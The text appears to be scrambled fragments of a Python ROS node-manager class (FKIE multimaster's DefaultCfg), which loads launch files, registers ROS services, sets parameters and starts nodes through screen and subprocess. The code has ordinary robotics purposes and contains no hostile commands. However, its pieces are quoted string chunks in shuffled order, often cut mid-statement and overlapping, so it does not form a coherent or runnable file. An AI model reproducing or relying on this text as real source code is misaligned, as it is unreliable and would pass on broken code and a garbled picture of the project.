"'images': entry[2].split(','), 'description': self._decode(entry[3])} # get the capability nodes for item in self.roscfg.nodes:",
"def _get_start_delay(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/delay') try: return float(self.roscfg.params[param_name].value) except: pass return",
"self.roscfg.machines[item.machine_name] if roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) else: self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) # get the robot description",
"self.roscfg.clear_params) self.parameter_loaded = True def runNode(self, node, autostart=False): ''' Start the node with",
"file is found, take the first one launch_file = paths[0] if os.path.isfile(launch_file) and",
"self.runService is None: self.runService = rospy.Service('~run', Task, self.rosservice_start_node) if self.listService is None: self.listService",
"%s\" % self.launch_file) self.package = rospy.get_param('~package', '') rospy.loginfo(\"package: %s\" % self.package) self.do_autostart =",
"{} '''@ivar: Sensor description: C{dict(node name : [(sensor type, sensor name, sensor description),",
"was started! Exceutables:\\n%s' % str(cmd)) def _run_node(self, cmd, cwd, env, node, autostart=False): self._pending_starts.add(node)",
"self.nodes = [] '''@ivar: the list with names of nodes with name spaces.'''",
"cmd[0]] cmd_args = [ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):] = node_cmd cmd_args.append(n.args) cmd_args[len(cmd_args):] = args # print",
"continue result.append(a) return result def load(self, delay_service_creation=0.): ''' Load the launch file configuration",
"required topic `%s` is ignored!' % topic) topic = '' elif not rosgraph.names.is_global(topic):",
"= rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: import roslib.rosenv return roslib.rosenv.get_ros_home() else:",
"server \"\"\" try: import xmlrpclib except ImportError: import xmlrpc.client as xmlrpclib param_server =",
"an empty string, if the C{file} is an absolute path @type package: C{str}",
"result[machine_name][ns]: try: result[machine_name][ns][p.value] = {'type': capabilies_descr[p.value]['type'], 'images': capabilies_descr[p.value]['images'], 'description': capabilies_descr[p.value]['description'], 'nodes': []} except:",
"= ListDescriptionResponse() dr.robot_name = '' dr.robot_type = '' dr.robot_descr = '' for param,",
"configuration. ''' pass class DefaultCfg(object): def __init__(self): self.nodes = [] '''@ivar: the list",
"given package if package: paths = roslib.packages.find_resource(package, launch_file) if len(paths) > 0: #",
"None if self.listService is not None: self.listService.shutdown('reload config') self.listService = None self.nodes =",
"Sensor description: C{dict(node name : [(sensor type, sensor name, sensor description), ...])}''' self.robot_descr",
"start_timer = threading.Timer(3., self._run_node, args=(cmd, cwd, env, node, autostart)) start_timer.start() if start_now and",
"OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER",
"not found!' % (filename, pkg)) return cmd def _get_start_exclude(self, node): param_name = rospy.names.ns_join(node,",
"start_required = self._get_start_required(node) if autostart and start_required: start_now = False # get published",
"in groups: groups[p.value]['nodes'].append(node_fullname) added = True break if not added: ns = cap_ns",
"break if n is None: raise StartException(\"Node '%s' not found!\" % node) if",
"'delay': 0} respawn_max = rospy.names.ns_join(node, 'respawn/max') respawn_min_runtime = rospy.names.ns_join(node, 'respawn/min_runtime') respawn_delay = rospy.names.ns_join(node,",
"not found!\" % node) if autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)): # skip autostart rospy.loginfo(\"%s",
"ROS master URI @rtype: C{str} ''' try: import rospkg.distro distro = rospkg.distro.current_distro_codename() if",
"import threading from .screen_handler import ScreenHandler # , ScreenHandlerException class LoadException(Exception): ''' The",
"text) ''' self.package = '' self.file = '' self.__lock = threading.RLock() # Load",
"format, expected: ['host(ROS master Name)', 'type', 'name', 'images', 'description'] -> ignore\", param) else:",
"def _decode(self, val): ''' Replaces the '\\\\n' by LF (Line Feed) and decode",
"# finally: # self.__lock.release() # return [] def rosservice_description(self, req): ''' Returns the",
"try: cmd = roslib.packages.find_node(pkg, filename) except roslib.packages.ROSPkgException as e: # multiple nodes, invalid",
"0.: t = threading.Timer(delay_service_creation, self._timed_service_creation) t.start() else: self._timed_service_creation() # self.timer = rospy.Timer(rospy.Duration(2), self.timed_service_creation,",
"topic) topic = '' elif not rosgraph.names.is_global(topic): topic = rospy.names.ns_join(rosgraph.names.namespace(node), topic) except: pass",
"self._pending_starts_last_printed != self._pending_starts: self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending autostarts %d: %s\", len(self._pending_starts), self._pending_starts) def _get_node(self,",
"os.path.isfile(launch_file) and os.path.exists(launch_file): return launch_file raise LoadException('File %s in package [%s] not found!'",
"published topics from ROS master master = rosgraph.masterapi.Master(self.masteruri) for topic, datatype in master.getPublishedTopics(''):",
"derived # from this software without specific prior written permission. # # THIS",
"break except: pass # get the sensor description tmp_cap_dict = self.getCapabilitiesDesrc() for machine,",
"subprocess import sys import threading from .screen_handler import ScreenHandler # , ScreenHandlerException class",
"if n is None: raise StartException(\"Node '%s' not found!\" % node) if autostart",
"if respawn_params['min_runtime'] > 0: n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' % respawn_params['min_runtime'])) if respawn_params['delay'] > 0: n.env_args.append(('RESPAWN_DELAY',",
"name spaces.''' self.sensors = {} '''@ivar: Sensor description: C{dict(node name : [(sensor type,",
"if rosgraph.names.is_private(topic): rospy.logwarn('Private for autostart required topic `%s` is ignored!' % topic) topic",
"r: # if code != 1: # raise StartException(\"Failed to clear parameter: %s\"%(msg))",
"None try: cmd = roslib.packages.find_node(pkg, filename) except roslib.packages.ROSPkgException as e: # multiple nodes,",
"n.namespace: new_env['ROS_NAMESPACE'] = n.namespace # set delayed autostart parameter self._run_node(popen_cmd, cwd, new_env, rospy.names.ns_join(n.namespace,",
"for group, descr_dict in group_dict.items(): if descr_dict['nodes']: cap = Capability() cap.namespace = ns",
"= False def _decode(self, val): ''' Replaces the '\\\\n' by LF (Line Feed)",
"rospkg return rospkg.get_ros_home() except: import traceback print(traceback.format_exc()) import roslib.rosenv return roslib.rosenv.get_ros_home() @classmethod def",
"= item.machine_name if item.machine_name is not None and not item.machine_name == 'localhost' else",
"ListDescription, ListNodes, Task, ListDescriptionResponse, ListNodesResponse # , LoadLaunch from rosgraph.rosenv import ROS_NAMESPACE from",
"NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY",
"= {'type': ''.join([entry[1]]), 'images': entry[2].split(','), 'description': self._decode(entry[3])} # get the capability nodes for",
"in result[machine_name].items(): if ns == cap_ns and p.value in groups: groups[p.value]['nodes'].append(node_fullname) added =",
"roslib.names.ns_join(node_fullname, 'capability_group') cap_ns = node_fullname # find the capability group parameter in namespace",
"self.listService is None: self.listService = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) except: import traceback print(traceback.format_exc()) def",
"= rospy.names.ns_join(node, 'default_cfg/autostart/delay') try: return float(self.roscfg.params[param_name].value) except: pass return 0. def _get_start_required(self, node):",
"OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF",
"= self.roscfg.machines[n.machine_name] # TODO: env-loader support? # if machine.env_args: # env[len(env):] = machine.env_args",
"@param path: the file name of the launch file @type path: C{str} @param",
"with the same name found in the package, the first one will be",
"self.roscfg, verbose=False, argv=argv) # create the list with node names for item in",
"if self.listService is not None: self.listService.shutdown('reload config') self.listService = None self.nodes = []",
"rospy.Service('~description', ListDescription, self.rosservice_description) self.runService = None '''@ivar: The service will be created on",
"in binary form must reproduce the above # copyright notice, this list of",
"launch file to inform the caller about a new configuration. ''' self.listService =",
"THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF",
"the launch file @rtype: C{str} @raise LoadException: if the given file is not",
"name found in the package, the first one will be tacked. @param path:",
"env = n.env_args prefix = n.launch_prefix if n.launch_prefix is not None else ''",
"MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT",
"new_env, rospy.names.ns_join(n.namespace, n.name), autostart) if len(cmd) > 1: raise StartException('Multiple executables are found!",
"OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS",
"topic = '' elif not rosgraph.names.is_global(topic): topic = rospy.names.ns_join(rosgraph.names.namespace(node), topic) except: pass return",
"Searches for a launch file. If package is given, try first to find",
"cap_ns = roslib.names.SEP # if the 'capability_group' parameter found, assign node to the",
"while searching for the given launch file. ''' pass class StartException(Exception): ''' The",
"= n.namespace # set delayed autostart parameter self._run_node(popen_cmd, cwd, new_env, rospy.names.ns_join(n.namespace, n.name), autostart)",
"path @rtype: C{str} ''' try: import rospkg.distro distro = rospkg.distro.current_distro_codename() if distro in",
"C{capabilities} and C{capability_group} parameter and creates dictionary for grouping the nodes. @return: the",
"the string coding as system default @type val: str @return: the decoded string",
"self._run_node(popen_cmd, cwd, new_env, rospy.names.ns_join(n.namespace, n.name), autostart) if len(cmd) > 1: raise StartException('Multiple executables",
"in this configuration @rtype: C{dict(machine : dict(namespace: dict(group:dict('type' : str, 'description' : str,",
"self._get_node(n.package, n.type) # determine the current working path, Default: the package of the",
"node '%s as': %s\", node, str(' '.join(popen_cmd))) # remove the 'BASH_ENV' and 'ENV'",
"'localhost' else '' added = False cap_param = roslib.names.ns_join(node_fullname, 'capability_group') cap_ns = node_fullname",
"in r: if code != 1: raise StartException(\"Failed to set parameter: %s\" %",
"from sys.argv to avoid load the launchfile info local namespace sys.argv = list(argv)",
"import print_function from multimaster_msgs_fkie.msg import Capability from multimaster_msgs_fkie.srv import ListDescription, ListNodes, Task, ListDescriptionResponse,",
"cmd = None try: cmd = roslib.packages.find_node(pkg, filename) except roslib.packages.ROSPkgException as e: #",
"return 0. def _get_start_required(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher') topic = '' try:",
"if package is set, try to find the launch file in the given",
"try: # self.__lock.acquire() # self.load(req.package, req.file, req.argv) # finally: # self.__lock.release() # return",
"sys.argv = list(argv) # set the global environment to empty namespace os.environ[ROS_NAMESPACE] =",
"the pending autostart nodes self._pending_starts = set() self._pending_starts_last_printed = set() def _filter_args(self, argv):",
"'cturtle']: return roslib.rosenv.get_master_uri() else: return rosgraph.rosenv.get_master_uri() except: return roslib.rosenv.get_master_uri() def _timed_service_creation(self): with self.__lock:",
"'__name:=%s' % n.name] if not (n.cwd is None): args.append('__cwd:=%s' % n.cwd) # add",
"on error ''' result = val.replace(\"\\\\n \", \"\\n\") try: result = result.decode(sys.getfilesystemencoding()) except:",
"description # use two separate loops, to create the description list first for",
"The exception throwing while run a node containing in the loaded configuration. '''",
"def _timed_service_creation(self): with self.__lock: try: if self.runService is None: self.runService = rospy.Service('~run', Task,",
"objects are not reusable param_server_multi = xmlrpclib.MultiCall(param_server) for p in params.itervalues(): # suppressing",
"= [''] if n.respawn: respawn = self._get_node('node_manager_fkie', 'respawn') # set the respawn environment",
"import ROS_NAMESPACE from roslaunch import ROSLaunchConfig, XmlLoader import os import rosgraph.masterapi import rosgraph.names",
"the ROS service to start a node. ''' self.runNode(req.node) return [] def rosservice_reload(self,",
"file for C{capabilities} and C{capability_group} parameter and creates dictionary for grouping the nodes.",
"= True break if not added: ns = cap_ns # add new group",
"if self._pending_starts_last_printed != self._pending_starts: self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending autostarts %d: %s\", len(self._pending_starts), self._pending_starts) def",
"# try: # self.__lock.acquire() # self.load(req.package, req.file, req.argv) # finally: # self.__lock.release() #",
"== 'localhost': machine = self.roscfg.machines[item.machine_name] if roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) else: self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) #",
"load parameters into the ROS parameter server if self.load_params_at_start: self.loadParams() # initialize the",
"self._get_start_delay(node) start_required = self._get_start_required(node) if autostart and start_required: start_now = False # get",
"self.runService = rospy.Service('~run', Task, self.rosservice_start_node) if self.listService is None: self.listService = rospy.Service('~list_nodes', ListNodes,",
"= item.namespace.rstrip(roslib.names.SEP) # if the parameter group parameter found, assign node to the",
"to the group if cap_param in self.roscfg.params and self.roscfg.params[cap_param].value: p = self.roscfg.params[cap_param] if",
"rospy.loginfo(\"Pending autostarts %d: %s\", len(self._pending_starts), self._pending_starts) def _get_node(self, pkg, filename): cmd = None",
"rospy.loginfo(\"%s is in exclude list, skip autostart\", n.name) return # env = n.env_args",
"self.roscfg.params[cap_param] if machine_name not in result: result[machine_name] = dict() for (ns, groups) in",
"popen_cmd = shlex.split(str(' '.join(cmd_args))) rospy.loginfo(\"run node '%s as': %s\", node, str(' '.join(popen_cmd))) #",
"one launch file is found, take the first one launch_file = paths[0] if",
"ListDescriptionResponse() # variables to print the pending autostart nodes self._pending_starts = set() self._pending_starts_last_printed",
"len(paths) > 0: # if more then one launch file is found, take",
"sensor description), ...])}''' self.robot_descr = ('', '', '') '''@ivar: robot description as tupel",
"rqt if n.namespace: new_env['ROS_NAMESPACE'] = n.namespace # set delayed autostart parameter self._run_node(popen_cmd, cwd,",
"topic `%s` is ignored!' % topic) topic = '' elif not rosgraph.names.is_global(topic): topic",
"absolute path of the launch file @rtype: C{str} @raise LoadException: if the given",
"if machine.env_args: # env[len(env):] = machine.env_args # nm.screen().testScreen() cmd = self._get_node(n.package, n.type) #",
"return launch_file raise LoadException('File %s in package [%s] not found!' % (path, package))",
"respawn_params['min_runtime'] > 0: n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' % respawn_params['min_runtime'])) if respawn_params['delay'] > 0: n.env_args.append(('RESPAWN_DELAY', '%d'",
"env=env) # wait for process to avoid 'defunct' processes thread = threading.Thread(target=ps.wait) thread.setDaemon(True)",
"def get_ros_home(self): ''' Returns the ROS HOME path depending on ROS distribution API.",
"Load the launch file # ''' # try: # self.__lock.acquire() # self.load(req.package, req.file,",
"first for param, p in self.roscfg.params.items(): if param.endswith('capabilities'): if isinstance(p.value, list): if len(p.value)",
"groups) in result[machine_name].items(): if ns == cap_ns and p.value in groups: groups[p.value]['nodes'].append(node_fullname) added",
"rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher') topic = '' try: topic = self.roscfg.params[param_name].value if rosgraph.names.is_private(topic): rospy.logwarn('Private for",
"'__name:=', '_package:=', '_launch_file:='] result = [] for a in argv: in_filter = False",
"binary forms, with or without # modification, are permitted provided that the following",
"% n.name] if not (n.cwd is None): args.append('__cwd:=%s' % n.cwd) # add remaps",
"ignored!' % topic) topic = '' elif not rosgraph.names.is_global(topic): topic = rospy.names.ns_join(rosgraph.names.namespace(node), topic)",
"OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #",
"# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED",
"value in self.roscfg.params.items(): params[param] = value # rospy.loginfo(\"register PARAMS:\\n%s\", '\\n'.join(params)) self._load_parameters(self.masteruri, params, self.roscfg.clear_params)",
"nodes for item in self.roscfg.nodes: node_fullname = roslib.names.ns_join(item.namespace, item.name) machine_name = item.machine_name if",
"if more then one launch file is found, take the first one launch_file",
"...])}''' self.robot_descr = ('', '', '') '''@ivar: robot description as tupel of (type,",
"= list(argv) # set the global environment to empty namespace os.environ[ROS_NAMESPACE] = rospy.names.SEP",
"self.argv) if not isinstance(self.argv, list): self.argv = [\"%s\" % self.argv] sys.argv.extend(self.argv) if self.do_autostart:",
"node, False)) start_timer.start() if start_now: ps = subprocess.Popen(cmd, cwd=cwd, env=env) # wait for",
"# find the capability group parameter in namespace while cap_param not in self.roscfg.params",
"p = self.roscfg.params[cap_param] if machine_name not in result: result[machine_name] = dict() for (ns,",
"False rospy.loginfo(\"load_params_at_start: %s\" % self.load_params_at_start) self.argv = rospy.get_param('~argv', []) rospy.loginfo(\"argv: %s\" % self.argv)",
"[respawn[0], prefix, cmd[0]] cmd_args = [ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):] = node_cmd cmd_args.append(n.args) cmd_args[len(cmd_args):] = args",
"if code != 1: raise StartException(\"Failed to set parameter: %s\" % (msg)) except",
"'') rospy.loginfo(\"package: %s\" % self.package) self.do_autostart = rospy.get_param('~autostart', False) rospy.loginfo(\"do_autostart: %s\" % self.do_autostart)",
"the above copyright # notice, this list of conditions and the following disclaimer.",
"BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF",
"depending on ROS distribution API. @return: ROS HOME path @rtype: C{str} ''' try:",
"def load(self, delay_service_creation=0.): ''' Load the launch file configuration ''' with self.__lock: self._pending_starts.clear()",
"self.rosservice_reload) rospy.Service('~description', ListDescription, self.rosservice_description) self.runService = None '''@ivar: The service will be created",
"ns cap.name = group cap.type = descr_dict['type'] cap.images = list(descr_dict['images']) cap.description = descr_dict['description']",
"handle different result types str or array of string if sys.version_info[0] <= 2:",
"the above # copyright notice, this list of conditions and the following #",
"1: # raise StartException(\"Failed to clear parameter: %s\"%(msg)) # multi-call objects are not",
"machine.env_args: # env[len(env):] = machine.env_args # nm.screen().testScreen() cmd = self._get_node(n.package, n.type) # determine",
"roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) else: self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) # get the robot description self.description_response =",
"''' Searches for a launch file. If package is given, try first to",
"import os import rosgraph.masterapi import rosgraph.names import roslib.names import roslib.network import rospy import",
"EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. from __future__ import",
"nm.screen().testScreen() cmd = self._get_node(n.package, n.type) # determine the current working path, Default: the",
"return ListNodesResponse(self.nodes) def rosservice_start_node(self, req): ''' Callback for the ROS service to start",
"# self.runService = rospy.Service('~run', Task, self.rosservice_start_node) # self.listServic = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) #",
"self.file = '' self.__lock = threading.RLock() # Load parameter self.launch_file = rospy.get_param('~launch_file', '')",
"%s in package [%s] not found!' % (path, package)) def rosservice_list_nodes(self, req): '''",
"is set, try to find the launch file in the given package if",
"permitted provided that the following conditions # are met: # # * Redistributions",
"node environment parameter for k, v in n.env_args: new_env[k] = v # the",
"= self._get_start_required(node) if autostart and start_required: start_now = False # get published topics",
"except: pass return result def get_ros_home(self): ''' Returns the ROS HOME path depending",
"to inform the caller about a new configuration. ''' self.listService = None '''@ivar:",
"it causes too much spam # printlog(\"setting parameter [%s]\"%p.key) param_server_multi.setParam(rospy.get_name(), p.key, p.value) r",
"first to find the launch file in the given package. If more then",
"node_cmd = [respawn[0], prefix, cmd[0]] cmd_args = [ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):] = node_cmd cmd_args.append(n.args) cmd_args[len(cmd_args):]",
"e: # multiple nodes, invalid package raise StartException(str(e)) except Exception as e: raise",
"result types str or array of string if sys.version_info[0] <= 2: import types",
"IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF",
"print(entry[0], rospy.get_param('/mastername', '')) if not entry[0] or entry[0] == rospy.get_param('/mastername', ''): dr.robot_name =",
"result = result.decode(sys.getfilesystemencoding()) except: pass return result def getCapabilitiesDesrc(self): ''' Parses the launch",
"in result[machine_name][ns]: try: result[machine_name][ns][p.value] = {'type': capabilies_descr[p.value]['type'], 'images': capabilies_descr[p.value]['images'], 'description': capabilies_descr[p.value]['description'], 'nodes': []}",
"StartException('Multiple executables are found! The first one was started! Exceutables:\\n%s' % str(cmd)) def",
"loader.load(launch_path, self.roscfg, verbose=False, argv=argv) # create the list with node names for item",
"master URI depending on ROS distribution API. @return: ROS master URI @rtype: C{str}",
"and not item.machine_name == 'localhost' else '' added = False cap_param = roslib.names.ns_join(node_fullname,",
"param.endswith('capabilities'): if isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0]) != 4: print(\"WRONG",
"the caller about a new configuration. if self.runService is not None: self.runService.shutdown('reload config')",
"Returns the current description. ''' return self.description_response def loadParams(self): ''' Loads all parameter",
"e: raise StartException(str(e)) # handle different result types str or array of string",
"given launch file. ''' pass class StartException(Exception): ''' The exception throwing while run",
"return roslib.rosenv.get_master_uri() else: return rosgraph.rosenv.get_master_uri() except: return roslib.rosenv.get_master_uri() def _timed_service_creation(self): with self.__lock: try:",
"import ListDescription, ListNodes, Task, ListDescriptionResponse, ListNodesResponse # , LoadLaunch from rosgraph.rosenv import ROS_NAMESPACE",
"into the ROS parameter server if self.load_params_at_start: self.loadParams() # initialize the ROS services",
"as it causes too much spam # printlog(\"setting parameter [%s]\"%p.key) param_server_multi.setParam(rospy.get_name(), p.key, p.value)",
"try: result['delay'] = int(self.roscfg.params[respawn_delay].value) except: pass return result def get_ros_home(self): ''' Returns the",
"'images', 'description'] -> ignore\", param) else: for entry in p.value: capabilies_descr[entry[0]] = {'type':",
"autostarts try: self._pending_starts.remove(node) except: pass # print the current pending autostarts if self._pending_starts_last_printed",
"env[len(env):] = machine.env_args # nm.screen().testScreen() cmd = self._get_node(n.package, n.type) # determine the current",
"'', '') '''@ivar: robot description as tupel of (type, name, text) ''' self.package",
"[] # the name of nodes with namespace self.sensors = {} # sensor",
"following conditions # are met: # # * Redistributions of source code must",
"self.package) rospy.loginfo(\"loading launch file: %s\", launch_path) self.masteruri = self._masteruri_from_ros() self.roscfg = ROSLaunchConfig() loader",
"with names of nodes with name spaces.''' self.sensors = {} '''@ivar: Sensor description:",
"rosgraph.masterapi.Master(self.masteruri) for topic, datatype in master.getPublishedTopics(''): if start_required == topic: start_now = True",
"# return [] def rosservice_description(self, req): ''' Returns the current description. ''' return",
"rospy.names.ns_join(node, 'default_cfg/autostart/exclude') try: return bool(self.roscfg.params[param_name].value) except: pass return False def _get_start_delay(self, node): param_name",
"to find the launch file in the given package if package: paths =",
"Exception as e: rospy.logwarn(\"Error while start %s: %s\", n, e) self.do_autostart = False",
"= roslib.names.ns_join(cap_ns, 'capability_group') if cap_ns == node_fullname: cap_ns = item.namespace.rstrip(roslib.names.SEP) # if the",
"req): ''' Callback for the ROS service to get the list with available",
"p.value: try: print(entry[0], rospy.get_param('/mastername', '')) if not entry[0] or entry[0] == rospy.get_param('/mastername', ''):",
"% n.cwd) # add remaps for remap in n.remap_args: args.append('%s:=%s' % (remap[0], remap[1]))",
"on ROS distribution API. @return: ROS master URI @rtype: C{str} ''' try: import",
"self.parameter_loaded = True def runNode(self, node, autostart=False): ''' Start the node with given",
"of conditions and the following disclaimer. # * Redistributions in binary form must",
"IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY",
"n = item break if n is None: raise StartException(\"Node '%s' not found!\"",
"code != 1: raise StartException(\"Failed to set parameter: %s\" % (msg)) except Exception:",
"ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING",
"if cmd is None or len(cmd) == 0: raise StartException('%s in package [%s]",
"of the launch file @rtype: C{str} @raise LoadException: if the given file is",
"the robot description self.description_response = dr = ListDescriptionResponse() dr.robot_name = '' dr.robot_type =",
"ListDescriptionResponse() dr.robot_name = '' dr.robot_type = '' dr.robot_descr = '' for param, p",
"# set delayed autostart parameter self._run_node(popen_cmd, cwd, new_env, rospy.names.ns_join(n.namespace, n.name), autostart) if len(cmd)",
"('', '', '') '''@ivar: robot description as tupel of (type, name, text) '''",
"if not cap_ns: cap_ns = roslib.names.SEP cap_param = roslib.names.ns_join(cap_ns, 'capability_group') if cap_ns ==",
"dr.robot_name = self._decode(entry[2]) dr.robot_type = entry[1] dr.robot_images = entry[3].split(',') dr.robot_descr = self._decode(entry[4]) break",
"POSSIBILITY OF SUCH DAMAGE. from __future__ import print_function from multimaster_msgs_fkie.msg import Capability from",
"# Copyright (c) 2012, Fraunhofer FKIE/US, <NAME> # All rights reserved. # #",
"raise StartException(\"Node '%s' not found!\" % node) if autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)): #",
"for item in self.roscfg.nodes: node_fullname = roslib.names.ns_join(item.namespace, item.name) machine_name = item.machine_name if item.machine_name",
"of string if sys.version_info[0] <= 2: import types string_types = types.StringTypes else: string_types",
"this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED",
"INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED",
"import rospkg.distro distro = rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: return roslib.rosenv.get_master_uri()",
"except Exception as e: raise StartException(str(e)) # handle different result types str or",
"msg, _ in r: # if code != 1: # raise StartException(\"Failed to",
"unicode. @param val: the string coding as system default @type val: str @return:",
"= self._filter_args(sys.argv) # remove namespace from sys.argv to avoid load the launchfile info",
"to empty namespace os.environ[ROS_NAMESPACE] = rospy.names.SEP rospy.set_param('~argv_used', list(set(argv))) loader.load(launch_path, self.roscfg, verbose=False, argv=argv) #",
"dr.robot_descr = '' for param, p in self.roscfg.params.items(): if param.endswith('robots'): if isinstance(p.value, list):",
"# the ROS_NAMESPACE environment is used in cpp plugins in rqt if n.namespace:",
"parameter server if self.load_params_at_start: self.loadParams() # initialize the ROS services # HACK to",
"'default_cfg/autostart/delay') try: return float(self.roscfg.params[param_name].value) except: pass return 0. def _get_start_required(self, node): param_name =",
"\", \"\\n\") try: result = result.decode(sys.getfilesystemencoding()) except: pass return result def getCapabilitiesDesrc(self): '''",
"= self._masteruri_from_ros() self.roscfg = ROSLaunchConfig() loader = XmlLoader() argv = self._filter_args(sys.argv) # remove",
"autostart rospy.loginfo(\"%s is in exclude list, skip autostart\", n.name) return # env =",
"int(self.roscfg.params[respawn_max].value) except: pass try: result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value) except: pass try: result['delay'] = int(self.roscfg.params[respawn_delay].value)",
"def loadParams(self): ''' Loads all parameter into ROS parameter server. ''' params =",
"node, autostart)) start_timer.start() if start_now and autostart and start_delay > 0: start_now =",
"array of string if sys.version_info[0] <= 2: import types string_types = types.StringTypes else:",
"parameter server \"\"\" try: import xmlrpclib except ImportError: import xmlrpc.client as xmlrpclib param_server",
"0 and len(p.value[0]) != 5: print(\"WRONG format, expected: ['host(ROS master Name)', 'type', 'name',",
"ns, group_dict in ns_dict.items(): for group, descr_dict in group_dict.items(): if descr_dict['nodes']: cap =",
"create the description list first for param, p in self.roscfg.params.items(): if param.endswith('capabilities'): if",
"for f in afilter: if a.startswith(f): in_filter = True break if ':=' not",
"# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #",
"configuration ''' with self.__lock: self._pending_starts.clear() # shutdown the services to inform the caller",
"node if ns not in result[machine_name]: result[machine_name][ns] = dict() if p.value not in",
"n.type) # determine the current working path, Default: the package of the node",
"shlex.split(str(' '.join(cmd_args))) rospy.loginfo(\"run node '%s as': %s\", node, str(' '.join(popen_cmd))) # remove the",
"to let the node_manager to update the view if delay_service_creation > 0.: t",
"are permitted provided that the following conditions # are met: # # *",
"namespace os.environ[ROS_NAMESPACE] = rospy.names.SEP rospy.set_param('~argv_used', list(set(argv))) loader.load(launch_path, self.roscfg, verbose=False, argv=argv) # create the",
"= self.roscfg.machines[item.machine_name] if roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) else: self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) # get the robot",
"distro = rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: import roslib.rosenv return roslib.rosenv.get_ros_home()",
"with the distribution. # * Neither the name of Fraunhofer nor the names",
"Fraunhofer nor the names of its # contributors may be used to endorse",
"finally: # self.__lock.release() # return [] def rosservice_description(self, req): ''' Returns the current",
"raise LoadException('File %s in package [%s] not found!' % (path, package)) def rosservice_list_nodes(self,",
"ignore\", param) else: for entry in p.value: capabilies_descr[entry[0]] = {'type': ''.join([entry[1]]), 'images': entry[2].split(','),",
"args = ['__ns:=%s' % n.namespace, '__name:=%s' % n.name] if not (n.cwd is None):",
"self.runService.shutdown('reload config') self.runService = None if self.listService is not None: self.listService.shutdown('reload config') self.listService",
"# sensor descriptions launch_path = self.getPath(self.launch_file, self.package) rospy.loginfo(\"loading launch file: %s\", launch_path) self.masteruri",
"and len(p.value[0]) != 5: print(\"WRONG format, expected: ['host(ROS master Name)', 'type', 'name', 'images',",
"import rosgraph.names import roslib.names import roslib.network import rospy import shlex import std_srvs.srv import",
"list of conditions and the following disclaimer. # * Redistributions in binary form",
"class DefaultCfg(object): def __init__(self): self.nodes = [] '''@ivar: the list with names of",
"package is set, try to find the launch file in the given package",
"roslib.names import roslib.network import rospy import shlex import std_srvs.srv import subprocess import sys",
"timer for waiting for the topic start_timer = threading.Timer(3., self._run_node, args=(cmd, cwd, env,",
"Callback for the ROS service to start a node. ''' self.runNode(req.node) return []",
"# self.listServic = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) # except: # import traceback # print",
"n = None for item in self.roscfg.nodes: itemname = rospy.names.ns_join(item.namespace, item.name) if itemname",
"pass # get the sensor description tmp_cap_dict = self.getCapabilitiesDesrc() for machine, ns_dict in",
"> 0.: t = threading.Timer(delay_service_creation, self._timed_service_creation) t.start() else: self._timed_service_creation() # self.timer = rospy.Timer(rospy.Duration(2),",
"of nodes with namespace self.sensors = {} # sensor descriptions launch_path = self.getPath(self.launch_file,",
"except: pass # get the sensor description tmp_cap_dict = self.getCapabilitiesDesrc() for machine, ns_dict",
"not reusable param_server_multi = xmlrpclib.MultiCall(param_server) for p in params.itervalues(): # suppressing this as",
"= list(descr_dict['images']) cap.description = descr_dict['description'] cap.nodes = list(descr_dict['nodes']) dr.capabilities.append(cap) # load parameters into",
"initialize the ROS services # HACK to let the node_manager to update the",
"products derived # from this software without specific prior written permission. # #",
